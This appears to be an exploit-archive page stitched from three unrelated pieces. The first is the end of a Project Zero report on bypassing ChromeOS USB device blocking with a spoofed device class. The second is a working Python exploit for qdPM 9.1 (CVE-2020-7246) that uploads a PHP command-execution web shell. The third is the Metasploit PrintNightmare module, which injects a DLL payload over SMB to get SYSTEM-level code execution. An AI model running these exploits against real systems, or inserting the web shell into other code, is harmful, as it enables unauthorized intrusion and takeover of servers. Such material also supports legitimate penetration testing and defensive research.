usb 1-1: new high-speed USB device number 31 using xhci_hcd<br />[ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10<br />[ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3<br />[ 6411.738916] usb 1-1: Product: [...]<br />[ 6411.738921] usb 1-1: Manufacturer: SanDisk<br />[ 6411.738926] usb 1-1: SerialNumber: [...]<br />[ 6411.740583] usb 1-1: Device is not authorized for usage<br />[ 6414.875133] cros-ec-sensorhub [...]<br />[ 6418.603609] usb 1-1: USB disconnect, device number 31<br /><br />But if we use a Linux machine with appropriate hardware (I'm using a NET2380 dev<br />board, but you could probably also do it with an unlocked Pixel phone or a<br />Raspberry Pi Zero W or something like that) to emulate a USB Mass Storage<br />device, using <https://docs.kernel.org/usb/mass-storage.html>, and patch one<br />line in the attacker kernel so that it claims to be a billboard, not a storage<br />device:<br /><br /><br />diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.c<br />index b859a158a414..d7452c8458a9 100644<br />--- a/drivers/usb/gadget/function/storage_common.c<br />+++ b/drivers/usb/gadget/function/storage_common.c<br />@@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = {<br /> .bDescriptorType = USB_DT_INTERFACE,<br /> <br /> .bNumEndpoints = 2, /* Adjusted during fsg_bind() */<br />- .bInterfaceClass = USB_CLASS_MASS_STORAGE,<br />+ .bInterfaceClass = USB_CLASS_BILLBOARD,<br /> .bInterfaceSubClass = USB_SC_SCSI, /* Adjusted during fsg_bind() */<br /> .bInterfaceProtocol = USB_PR_BULK, /* Adjusted during fsg_bind() */<br /> .iInterface = FSG_STRING_INTERFACE,<br /><br /><br />Then we can connect just fine even while the screen is locked - first we get a<br />\"Device is not authorized\" message on the initial connection, then usbguard<br />unblocks us and the kernel probes the device as a mass storage device and scans<br />the partition table:<br /><br />[ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd<br />[ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17<br />[ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0<br />[ 6432.885653] usb 1-1: Product: Mass Storage Gadget<br />[ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280<br />[ 6432.886121] usb 1-1: Device is not authorized for usage<br />[ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected<br />[ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000<br />[ 6432.892090] scsi host0: usb-storage 1-1:1.0<br />[ 6432.892567] usb 1-1: authorized to connect<br />[ 6433.920354] scsi 0:0:0:0: Direct-Access Linux File-Stor Gadget 0517 PQ: 0 ANSI: 2<br />[ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred<br />[ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB)<br />[ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off<br />[ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00<br />[ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA<br />[ 6434.363462] sda: sda1 sda2<br />[ 6434.585367] cros-ec-sensorhub [...]<br />[ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI disk<br /><br /><br />I haven't looked at how this issue applies to other USB subsystems in detail,<br />but from a quick glance:<br /><br /> - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some<br /> number-to-string translation table, so I don't think it matters to the kernel.<br /> - Same thing with USB_CLASS_STILL_IMAGE.<br /> - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but<br /> that check is intentionally bypassed for known devices that are marked in<br /> the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the<br /> \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you<br /> can probably also bypass the blocking of the printer interface class that way.<br /><br /><br /><br />I think the best way forward would be to look into whether it is feasible to<br />rely exclusively on a trust-on-first-use approach. If that is infeasible, you<br />may have to talk to upstream about how userspace can reliably determine which<br />driver(s) a given USB device might be bound to, since I'm not aware of any<br />interface that would let you do that.<br /><br /><br />VERSION<br />Google Chrome 98.0.4758.107 (Official Build) (64-bit) <br />Revision a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167}<br />Platform 14388.61.0 (Official Build) stable-channel eve<br />Firmware Version Google_Eve.9584.230.0<br />Customization ID GOOGLE-EVE<br />ARC 8165997<br /><br /><br />CREDIT INFORMATION<br />Reporter credit: Jann Horn of Google Project Zero<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2022-05-25.<br /><br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code># Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)<br /># Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net<br /># Date: 2021-08-03<br /># Original Exploit Author: Rishal Dwivedi (Loginsoft)<br /># Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)<br /># Exploit Author: Leon Trappett (thepcn3rd)<br /># Vendor Homepage: http://qdpm.net/<br /># Software Link: http://qdpm.net/download-qdpm-free-project-management<br /># Version: <=1.9.1<br /># Tested on: Ubuntu Server 20.04 (Python 3.9.2)<br /># CVE : CVE-2020-7246<br /># Exploit written in Python 3.9.2<br /># Tested Environment - Ubuntu Server 20.04 LTS<br /># Path Traversal + Remote Code Execution<br /># Exploit modification: RedHatAugust<br /><br />#!/usr/bin/python3<br /><br />import sys<br />import requests<br />from lxml import html<br />from argparse import ArgumentParser<br /><br />session_requests = requests.session()<br /><br />def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):<br /> request_1 = {<br /> 'sf_method': (None, 'put'),<br /> 'users[id]': (None, userid[-1]),<br /> 'users[photo_preview]': (None, uservar),<br /> 'users[_csrf_token]': (None, csrftoken_[-1]),<br /> 'users[name]': (None, username[-1]),<br /> 'users[new_password]': (None, ''),<br /> 'users[email]': (None, EMAIL),<br /> 'extra_fields[9]': (None, ''),<br /> 'users[remove_photo]': (None, '1'),<br /> }<br /> return request_1<br /><br /><br />def req(userid, username, csrftoken_, EMAIL, HOSTNAME):<br /> request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')<br /> new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)<br /> request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')<br /> new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)<br /> request_3 = {<br /> 'sf_method': (None, 'put'),<br /> 'users[id]': (None, userid[-1]),<br /> 'users[photo_preview]': (None, ''),<br /> 'users[_csrf_token]': (None, csrftoken_[-1]),<br /> 'users[name]': (None, username[-1]),<br /> 'users[new_password]': (None, ''),<br /> 'users[email]': (None, EMAIL),<br /> 'extra_fields[9]': (None, ''),<br /> 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),<br /> }<br /> upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)<br /><br /><br />def main(HOSTNAME, EMAIL, PASSWORD):<br /> url = HOSTNAME + '/index.php/login'<br /> result = session_requests.get(url)<br /> #print(result.text)<br /> login_tree = html.fromstring(result.text)<br /> authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]<br /> payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}<br /> result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))<br /> # The designated admin account does not have a myAccount page<br /> account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')<br /> account_tree = html.fromstring(account_page.content)<br /> userid = account_tree.xpath("//input[@name='users[id]']/@value")<br /> username = account_tree.xpath("//input[@name='users[name]']/@value")<br /> csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")<br /> req(userid, username, csrftoken_, EMAIL, HOSTNAME)<br /> get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')<br /> final_tree = html.fromstring(get_file.content)<br /> backdoor = requests.get(HOSTNAME + "uploads/users/")<br /> count = 0<br /> dateStamp = "1970-01-01 00:00"<br /> backdoorFile = ""<br /> for line in backdoor.text.split("\n"):<br /> count = count + 1<br /> if "backdoor.php" in str(line):<br /> try:<br /> start = "\"right\""<br /> end = " </td"<br /> line = str(line)<br /> dateStampNew = line[line.index(start)+8:line.index(end)]<br /> if (dateStampNew > dateStamp):<br /> dateStamp = dateStampNew<br /> print("The DateStamp is " + dateStamp)<br /> backdoorFile = line[line.index("href")+6:line.index("php")+3]<br /> except:<br /> print("Exception occurred")<br /> continue<br /> #print(backdoor)<br /> print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')<br /><br />if __name__ == '__main__':<br /> print("You are not able to use the designated admin account because they do not have a myAccount page.\n")<br /> parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')<br /> parser.add_argument('-url', '--host', dest='hostname', help='Project URL')<br /> parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')<br /> parser.add_argument('-p', '--password', dest='password', help='User password')<br /> args = parser.parse_args()<br /> # Added detection if the arguments are passed and populated, if not display the arguments<br /> if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):<br /> main(args.hostname, args.email, args.password)<br /> else:<br /> parser.print_help()<br /> <br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'windows_error'<br />require 'ruby_smb'<br />require 'ruby_smb/error'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::DCERPC<br /> include Msf::Exploit::Remote::SMB::Client::Authenticated<br /> include Msf::Exploit::Remote::SMB::Server::Share<br /> include Msf::Exploit::Retry<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Deprecated<br /><br /> moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'<br /><br /> PrintSystem = RubySMB::Dcerpc::PrintSystem<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Print Spooler Remote DLL Injection',<br /> 'Description' => %q{<br /> The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted<br /> DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN<br /> vector which requires the Print Spooler service to be running.<br /> },<br /> 'Author' => [<br /> 'Zhiniang Peng', # vulnerability discovery / research<br /> 'Xuefeng Li', # vulnerability discovery / research<br /> 'Zhipeng Huo', # vulnerability discovery<br /> 'Piotr Madej', # vulnerability discovery<br /> 'Zhang Yunhai', # vulnerability discovery<br /> 'cube0x0', # PoC<br /> 'Spencer McIntyre', # metasploit module<br /> 'Christophe De La Fuente', # metasploit module co-author<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'SRVHOST' => Rex::Socket.source_address<br /> },<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> [<br /> 'Windows', {<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ]<br /> },<br /> ],<br /> ],<br /> 'DisclosureDate' => '2021-06-08',<br /> 'References' => [<br /> ['CVE', '2021-1675'],<br /> ['CVE', '2021-34527'],<br /> ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],<br /> ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],<br /> ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],<br /> ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']<br /> ],<br /> 'Notes' => {<br /> 'AKA' => [ 'PrintNightmare' ],<br /> 'Stability' => [CRASH_SERVICE_DOWN],<br /> 'Reliability' => [UNRELIABLE_SESSION],<br /> 'SideEffects' => [<br /> ARTIFACTS_ON_DISK # the dll will be copied to the remote server<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])<br /> ]<br /> )<br /> deregister_options('AutoCheck')<br /> end<br /><br /> def check<br /> begin<br /> connect(backend: :ruby_smb)<br /> rescue Rex::ConnectionError<br /> return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')<br /> end<br /><br /> begin<br /> smb_login<br /> rescue Rex::Proto::SMB::Exceptions::LoginError<br /> return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')<br /> end<br /><br /> begin<br /> dcerpc_bind_spoolss<br /> rescue RubySMB::Error::UnexpectedStatusCode => e<br /> nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first<br /> if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND<br /> print_error("The 'Print Spooler' service is disabled.")<br /> end<br /> return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).")<br /> end<br /><br /> @target_arch = dcerpc_getarch<br /> # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43<br /> if @target_arch == ARCH_X64<br /> @environment = 'Windows x64'<br /> elsif @target_arch == ARCH_X86<br /> @environment = 'Windows NT x86'<br /> else<br /> return Exploit::CheckCode::Detected('Successfully bound to the remote service.')<br /> end<br /><br /> print_status("Target environment: Windows v#{simple.client.os_version} (#{@target_arch})")<br /><br /> print_status('Enumerating the installed printer drivers...')<br /> drivers = enum_printer_drivers(@environment)<br /> @driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"<br /> vprint_status("Using driver path: #{@driver_path}")<br /><br /> print_status('Retrieving the path of the printer driver directory...')<br /> @config_directory = get_printer_driver_directory(@environment)<br /> vprint_status("Using driver directory: #{@config_directory}") unless @config_directory.nil?<br /><br /> container = driver_container(<br /> p_config_file: 'C:\\Windows\\System32\\kernel32.dll',<br /> p_data_file: "\\??\\UNC\\127.0.0.1\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll"<br /> )<br /><br /> case add_printer_driver_ex(container)<br /> when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code<br /> return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')<br /> when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND<br /> return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')<br /> when ::WindowsError::Win32::ERROR_BAD_NET_NAME<br /> return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')<br /> when ::WindowsError::Win32::ERROR_ACCESS_DENIED<br /> return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')<br /> end<br /><br /> Exploit::CheckCode::Detected('Successfully bound to the remote service.')<br /> end<br /><br /> def run<br /> fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64<br /> fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?<br /> fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?<br /><br /> super<br /> end<br /><br /> def setup<br /> if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0<br /> fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')<br /> end<br /><br /> super<br /> end<br /><br /> def start_service<br /> file_name << '.dll'<br /> self.file_contents = generate_payload_dll<br /><br /> super<br /> end<br /><br /> def primer<br /> dll_path = unc<br /> if dll_path =~ /^\\\\([\w:.\[\]]+)\\(.*)$/<br /> # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass<br /> # otherwise the operation will fail with ERROR_INVALID_PARAMETER<br /> dll_path = "\\??\\UNC\\#{Regexp.last_match(1)}\\#{Regexp.last_match(2)}"<br /> end<br /> vprint_status("Using DLL path: #{dll_path}")<br /><br /> filename = dll_path.rpartition('\\').last<br /> container = driver_container(p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: dll_path)<br /><br /> 3.times do<br /> add_printer_driver_ex(container)<br /> end<br /><br /> 1.upto(3) do |directory|<br /> container.driver_info.p_config_file.assign("#{@config_directory}\\3\\old\\#{directory}\\#{filename}")<br /> break if add_printer_driver_ex(container).nil?<br /> end<br /><br /> cleanup_service<br /> end<br /><br /> def driver_container(**kwargs)<br /> PrintSystem::DriverContainer.new(<br /> level: 2,<br /> tag: 2,<br /> driver_info: PrintSystem::DriverInfo2.new(<br /> c_version: 3,<br /> p_name_ref_id: 0x00020000,<br /> p_environment_ref_id: 0x00020004,<br /> p_driver_path_ref_id: 0x00020008,<br /> p_data_file_ref_id: 0x0002000c,<br /> p_config_file_ref_id: 0x00020010,<br /> # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913<br /> p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",<br /> p_environment: @environment,<br /> p_driver_path: @driver_path,<br /> **kwargs<br /> )<br /> )<br /> end<br /><br /> def dcerpc_bind_spoolss<br /> handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])<br /> vprint_status("Binding to #{handle} ...")<br /> dcerpc_bind(handle)<br /> vprint_status("Bound to #{handle} ...")<br /> end<br /><br /> def enum_printer_drivers(environment)<br /> response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)<br /> response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)<br /> fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length<br /> DriverInfo2.read(response.p_drivers.map(&:chr).join)<br /> end<br /><br /> def get_printer_driver_directory(environment)<br /> response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)<br /> response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)<br /> fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length<br /> RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')<br /> end<br /><br /> def add_printer_driver_ex(container)<br /> flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES<br /><br /> begin<br /> response = rprn_call('RpcAddPrinterDriverEx', p_name: "\\\\#{datastore['RHOST']}", p_driver_container: container, dw_file_copy_flags: flags)<br /> rescue RubySMB::Error::UnexpectedStatusCode => e<br /> nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first<br /> message = "Error #{nt_status.name} (#{nt_status.description})"<br /> if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN<br /> # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected<br /> print_status('The named pipe connection was broken, reconnecting...')<br /> reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do<br /> dcerpc_bind_spoolss<br /> rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e<br /> false<br /> else<br /> true<br /> end<br /><br /> unless reconnected<br /> vprint_status('Failed to reconnect to the named pipe.')<br /> return nil<br /> end<br /><br /> print_status('Successfully reconnected to the named pipe.')<br /> retry<br /> else<br /> print_error(message)<br /> end<br /><br /> return nt_status<br /> end<br /><br /> error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first<br /> message = "RpcAddPrinterDriverEx response #{response.error_status}"<br /> message << " #{error.name} (#{error.description})" unless error.nil?<br /> vprint_status(message)<br /> error<br /> end<br /><br /> def rprn_call(name, **kwargs)<br /> request = PrintSystem.const_get("#{name}Request").new(**kwargs)<br /><br /> begin<br /> raw_response = dcerpc.call(request.opnum, request.to_binary_s)<br /> rescue Rex::Proto::DCERPC::Exceptions::Fault => e<br /> fail_with(Failure::UnexpectedReply, "The #{name} Print System RPC request failed (#{e.message}).")<br /> end<br /><br /> PrintSystem.const_get("#{name}Response").read(raw_response)<br /> end<br /><br /> class DriverInfo2Header < BinData::Record<br /> endian :little<br /><br /> uint32 :c_version<br /> uint32 :name_offset<br /> uint32 :environment_offset<br /> uint32 :driver_path_offset<br /> uint32 :data_file_offset<br /> uint32 :config_file_offset<br /> end<br /><br /> # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2<br /> # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030<br /> DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do<br /> def self.read(data)<br /> header = DriverInfo2Header.read(data)<br /> new(<br /> header,<br /> RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),<br /> RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),<br /> RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),<br /> RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),<br /> RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')<br /> )<br /> end<br /> end<br />end<br /></code></pre>